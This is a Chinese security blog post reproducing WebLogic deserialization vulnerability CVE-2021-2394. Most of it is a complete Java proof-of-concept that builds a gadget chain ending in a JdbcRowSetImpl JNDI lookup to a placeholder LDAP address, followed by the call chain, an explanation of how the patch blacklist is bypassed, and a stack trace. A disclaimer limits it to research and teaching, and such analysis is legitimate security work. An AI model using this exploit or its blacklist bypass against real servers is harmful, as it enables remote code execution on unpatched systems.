Oracle WebLogic Server :12.2.1.3.0、12.2.1.4.0、14.1.1.0.0
POC:
package cve2021.cve_2021_2394;
import com.sun.rowset.JdbcRowSetImpl;
import com.tangosol.coherence.servlet.AttributeHolder;
import com.tangosol.util.SortedBag;
import com.tangosol.util.aggregator.TopNAggregator;
import oracle.eclipselink.coherence.integrated.internal.querying.FilterExtractor;
import org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor;
import org.eclipse.persistence.internal.descriptors.VirtualAttributeAccessor;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.concurrent.ConcurrentSkipListMap;
public class CVE_2021_2394 {
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
Field field = getField(obj.getClass(), fieldName);
field.set(obj, value);
}
public static Field getField(Class<?> clazz, String fieldName) {
Field field = null;
try {
field = clazz.getDeclaredField(fieldName);
field.setAccessible(true);
} catch (NoSuchFieldException var4) {
if (clazz.getSuperclass() != null) {
field = getField(clazz.getSuperclass(), fieldName);
}
}
return field;
}
public static void main(String[] args) throws Exception {
JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
jdbcRowSet.setDataSourceName("ldap://xxx.xxx.xxx.xxx");
MethodAttributeAccessor methodAttributeAccessor = new MethodAttributeAccessor();
methodAttributeAccessor.setIsWriteOnly(true);
methodAttributeAccessor.setAttributeName("123");
methodAttributeAccessor.setGetMethodName("prepare");
methodAttributeAccessor.setSetMethodName("setProperties");
FilterExtractor filterExtractor = new FilterExtractor();
filterExtractor.setAccessor(methodAttributeAccessor);
TopNAggregator.PartialResult partialResult = new TopNAggregator.PartialResult(filterExtractor,10);
AttrCompare attrCompare = new AttrCompare();
ConcurrentSkipListMap concurrentSkipListMap = new ConcurrentSkipListMap(attrCompare);
concurrentSkipListMap.put(jdbcRowSet,"123");
setFieldValue(partialResult,"m_map",concurrentSkipListMap);
AttributeHolder attributeHolder = new AttributeHolder();
setFieldValue(attributeHolder,"m_sName","111");
setFieldValue(attributeHolder,"m_oValue",partialResult);
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("oracle/1.ser"));
oos.writeObject(attributeHolder);
oos.close();
ObjectInputStream ois = new ObjectInputStream(new FileInputStream("oracle/1.ser"));
ois.readObject();
}
}
利用链:
AttributeHolder.readExternal()
ExternalizableHelper.readObject()
ExternalizableHelper.readObjectInternal()
ExternalizableHelper.readExternalizableLite()
TopNAggregator$PartialResult.readExternal()
SortedBag.add()
TreeMap.put()
TreeMap.compare()
SortedBag$WrapperComparator.compare()
AbstractExtractor.compare()
FilterExtractor.compare()
FilterExtractor.extract()
MethodAttributeAccessor.getAttributeValueFromObject()
Method.invoke()
JdbcRowSetImpl.connect()
sink:
org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor#getAttributeValueFromObject方法中存在反射调用,最好情况下getMethod、anObject、parameters均可控就可以造成调用任意对象的任意方法
如果打了补丁的情况下,MethodAttributeAccessor已经被拉入黑名单,但是如果在其他类的反序列化过程中存在MethodAttributeAccessor的创建并调用的话则还是可以绕过的
然后发现oracle.eclipselink.coherence.integrated.internal.cache.SerializationHelper#readAttributeAccessor中符合,会创建MethodAttributeAccessor对象并返回
并且他的attributeAccessor的值正是绕过黑名单调用的方法,可以创建MethodAttributeAccessor对象
其他的都是按照调用方法直接找调用关系即可,注意子父类之间的调用关系。
source:
由于TopNAggregator$PartialResult只实现了ExternalizableLite,因此还是需要实现了Externalizable的AttributeHolder去封装PartialResult从而正常地触发反序列化
lookup:417, InitialContext (javax.naming)
connect:624, JdbcRowSetImpl (com.sun.rowset)
prepare:654, JdbcRowSetImpl (com.sun.rowset)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:497, Method (java.lang.reflect)
getAttributeValueFromObject:82, MethodAttributeAccessor (org.eclipse.persistence.internal.descriptors)
getAttributeValueFromObject:61, MethodAttributeAccessor (org.eclipse.persistence.internal.descriptors)
extract:61, FilterExtractor (oracle.eclipselink.coherence.integrated.internal.querying)
compare:143, AbstractExtractor (com.tangosol.util.extractor)
compare:416, SortedBag$WrapperComparator (com.tangosol.util)
compare:1291, TreeMap (java.util)
put:538, TreeMap (java.util)
add:152, SortedBag (com.tangosol.util)
add:270, TopNAggregator$PartialResult (com.tangosol.util.aggregator)
readExternal:299, TopNAggregator$PartialResult (com.tangosol.util.aggregator)
readExternalizableLite:2345, ExternalizableHelper (com.tangosol.util)
readObjectInternal:2661, ExternalizableHelper (com.tangosol.util)
readObject:2606, ExternalizableHelper (com.tangosol.util)
readObject:2583, ExternalizableHelper (com.tangosol.util)
readExternal:407, AttributeHolder (com.tangosol.coherence.servlet)
readExternal:372, AttributeHolder (com.tangosol.coherence.servlet)
readExternalData:1842, ObjectInputStream (java.io)
readOrdinaryObject:1799, ObjectInputStream (java.io)
readObject0:1351, ObjectInputStream (java.io)
readObject:371, ObjectInputStream (java.io)
main:85, CVE_2021_2394 (cve2021.cve_2021_2394)
原文始发于微信公众号(路旅安全):Weblogic CVE-2021-2394漏洞复现分析原创
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论